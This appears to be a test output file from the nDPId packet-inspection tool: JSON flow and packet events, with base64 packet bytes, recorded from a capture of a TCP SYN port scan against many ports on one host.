+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":705,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/csAACYGJKesEAAIQA2GNIzTBRXdU4MZAAAAAGACDAAndwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsp+IAACkGd5CsEAAIQA2GNIzTAu3dU4MZAAAAAGACCAAtnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs3QAAADsGMHKsEAAIQA2GNIzTI43dU4MZAAAAAGACEAAE\/wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5810,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":708,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsaMEAACoGtbGsEAAIQA2GNIzTFrLdU4MZAAAAAGACDAAV2gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsytsAADUGSJesEAAIQA2GNIzTF2\/dU4MZAAAAAGACCAAZHQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":710,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsCaYAACgGFs2sEAAIQA2GNIzTGnvdU4MZAAAAAGACBAAaEQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs9VgAADIGIRqsEAAIQA2GNIzTJxTdU4MZAAAAAGACDAAFeAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsmN8AADoGdZOsEAAIQA2GNIzTHcndU4MZAAAAAGACDAAOwwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3905,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAswcUAADIGVK2sEAAIQA2GNIzTD0HdU4MZAAAAAGACDAAdSwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsRaYAACsG18ysEAAIQA2GNIzSBDvdUoMYAAAAAGACEAAkVAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsiPMAACwGk3+sEAAIQA2GNIzSIf3dUoMYAAAAAGACBAASkgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+0YAADcGFiysEAAIQA2GNIzSDT7dUoMYAAAAAGACEAAbUQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/f0AAC8GG3WsEAAIQA2GNIzSB1PdUoMYAAAAAGACEAAhPAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstrAAADgGWcKsEAAIQA2GNIzSBK\/dUoMYAAAAAGACBAAv4AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs+94AACwGIJSsEAAIQA2GNIzSBrndUoMYAAAAAGACBAAt1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAskckAADoGfKmsEAAIQA2GNIzSKhrdUoMYAAAAAGACDAACdQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsvA8AAC4GXmOsEAAIQA2GNIzSBrbdUoMYAAAAAGACDAAl2QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADQGcP2sEAAIQA2GNIzSPoDdUoMYAAAAAGACBAD2DgAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjYAADgGmjysEAAIQA2GNIzSAH3dUoMYAAAAAGACBAA0EgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAstNUAACgGa52sEAAIQA2GNIzSBnrdUoMYAAAAAGACBAAuFQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAs8U8AACUGMiOsEAAIQA2GNIzSBHzdUoMYAAAAAGACCAAsEwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059626,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059626,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZEAACkGseGsEAAIQA2GNIzSAW7dUoMYAAAAAGACCAAvIQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAszmgAADIGSAqsEAAIQA2GNIzSwA3dUoMYAAAAAGACDABsgQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059627,"pkt":"ACYLMQczACWzv5HuCABFAAAsxpgAADcGStqsEAAIQA2GNIzSBy\/dUoMYAAAAAGACEAAhYAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059627,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 